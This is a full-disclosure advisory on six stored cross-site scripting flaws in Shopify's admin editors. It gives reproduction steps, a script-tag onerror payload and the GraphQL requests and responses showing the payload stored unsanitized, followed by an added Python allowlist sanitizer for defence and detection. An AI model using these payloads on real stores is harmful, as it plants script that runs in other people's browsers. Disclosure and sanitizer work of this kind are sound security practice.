Sunday, 12 March 2023

Full Disclosure - Shopify Application Stored Cross Site Scripting


Application

  • Shopify web application


Information

  • Input not validated
  • Stored Cross Site Scripting flaw


Exploit


XSS #1

1. Browse to Online Store

2. Select Pages ->  Add Page

3. Set Title -> Title_Name

4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix the HTML encoding of the tags: replace the entity-encoded form the editor produces (first line) with the raw form (second line)

&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"page":{"bodyHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

page":{"id":"gid://shopify/OnlineStorePage/...","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n\ntest","title":"Title_Name"

[...]


XSS #2

1. Browse to Online Store

2. Select Blog Posts -> Add Blog Post

3. Set Title -> Blog_Title

4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix the HTML encoding of the tags: replace the entity-encoded form the editor produces (first line) with the raw form (second line)

&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n","handle":"blog_title-2"

[...]


XSS #3

1. Browse to Products 

2. Select Collections -> Create Collection

3. Set Title -> Collection_Title

4. Set Content -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix the HTML encoding of the tags: replace the entity-encoded form the editor produces (first line) with the raw form (second line)

&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=CreateCollection&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"collection":{"title":"Collection_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"

[...]


XSS #4

1. Browse to Products 

2. Select Inventory -> View Products

3. Select Product -> Title -> Product_Title

4. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix the HTML encoding of the tags: replace the entity-encoded form the editor produces (first line) with the raw form (second line)

&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"product":{"descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>","workflow":"product-details-update"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"<script onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>"

[...]


XSS #5

1. Browse to Products 

2. Add Product -> Title -> Product_Title 

3. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

4. Select Show HTML 

5. Fix the HTML encoding of the tags: replace the entity-encoded form the editor produces (first line) with the raw form (second line)

&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]

[...]

"product":{"descriptionHtml":"<p>&nbsp;</p>...\"><script src=1 href=1 onerror=\"javascript:alert(1)\"></script>\n</code></pre>"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"title":"Gift_Title","><script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>\n</code></pre>",

[...]


XSS #6

1. Browse to Products 

2. Select Gift Cards

3. Add Gift Card Products -> Gift_Title

4. Set Description -> Paste Payload -> <script src=1 href=1 onerror="javascript:alert(1)"></script>

5. Select Show HTML 

6. Fix the HTML encoding of the tags: replace the entity-encoded form the editor produces (first line) with the raw form (second line)

&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation HTTP/2

Host: test-img-src-x-onerror-alert1-test.myshopify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0

[...]


[...]

"product":{"title":"Gift_Title","descriptionHtml":"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>"

[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK

Content-Type: application/json; charset=utf-8

[...]

[...]

"title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"<script src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"

[...]
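All six cases above share one root cause: the rich-text fields (bodyHtml, the article body, descriptionHtml) are stored and echoed back by the API with the script element and its onerror handler intact. The allowlist sanitizer below is an added example, not Shopify code, of the server-side control whose absence the disclosure reports. It is run over the disclosure's own payload and over constructed sample descriptions; it drops every tag outside a small allowlist, every on* attribute and every href/src that is not an http(s), mailto or relative URL, and records each removal so the same routine can feed detection logging. The allowlist, the SAFE_SCHEMES tuple and the sample inputs are assumptions chosen for the example.

```python
"""Allowlist HTML sanitizer for rich-text fields such as bodyHtml / descriptionHtml.

Added example (not Shopify code). Unknown tags, on* event handlers and
non-http(s) URLs are dropped before the value is stored, and every removal is
recorded so the routine can also serve as a detection signal in request logs.
The allowlist and the sample inputs below are assumptions chosen for the example.
"""
from html import escape
from html.parser import HTMLParser

# Tags a product description or blog post legitimately needs (assumed allowlist).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "u", "ul", "ol", "li",
                "h1", "h2", "h3", "pre", "code", "a", "img"}
# Attributes permitted per tag; anything not listed here is dropped.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
# href/src values must start with one of these; javascript: and data: never match.
SAFE_SCHEMES = ("http://", "https://", "mailto:", "/")
VOID_TAGS = {"br", "img"}
# Their content is raw script/style text, never user-visible prose: drop it whole.
RAW_TEXT_TAGS = {"script", "style"}


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized fragments, joined by result()
        self.findings = []   # human-readable record of everything removed
        self.stack = []      # allowed tags currently open, for balanced output
        self.skip_depth = 0  # > 0 while inside <script> / <style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            names = ",".join(name for name, _ in attrs) or "none"
            self.findings.append(f"dropped <{tag}> element (attributes: {names})")
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            self.findings.append(f"dropped tag <{tag}>")
            return  # the tag's text content is still kept, only the tag goes
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = (value or "").strip()
            if name.startswith("on"):
                self.findings.append(f"dropped event handler {name} on <{tag}>")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.findings.append(f"dropped attribute {name} on <{tag}>")
            elif name in ("href", "src") and not value.lower().startswith(SAFE_SCHEMES):
                self.findings.append(f"dropped unsafe {name}={value!r} on <{tag}>")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.stack:
            return  # stray closing tag (like the </code></pre> tail in XSS #5) is ignored
        while self.stack:  # close everything opened after this tag, then the tag itself
            top = self.stack.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # text is re-escaped, never raw

    def result(self):
        while self.stack:  # close tags the input left open
            self.out.append(f"</{self.stack.pop()}>")
        return "".join(self.out)


def sanitize(html):
    """Return (clean_html, findings) for one rich-text field value."""
    s = Sanitizer()
    s.feed(html)
    s.close()
    return s.result(), s.findings


# Constructed sample inputs: the payload from the disclosure plus two made-up descriptions.
SAMPLES = {
    "disclosure payload": '<script src=1 href=1 onerror="javascript:alert(1)"></script>',
    "benign description": '<p>Hand-made <b>leather</b> wallet</p>'
                          '<a href="https://example.com/care">Care guide</a>',
    "mixed description": '<p>Sale</p><img src="https://cdn.example.com/sale.png" onerror="alert(1)">'
                         '<a href="javascript:alert(1)">click</a>',
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        clean, findings = sanitize(raw)
        print(f"{label}: {clean!r}")
        for finding in findings:
            print(f"  - {finding}")
```

Because the routine reports what it stripped, a burst of "dropped <script>" findings on PageUpdate, ArticleUpdate, CreateCollection or UpdateProduct mutations is a usable alert signal before any stored value reaches a storefront. Running the same sanitizer on read as well as on write also covers content that was stored before sanitization was enforced.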

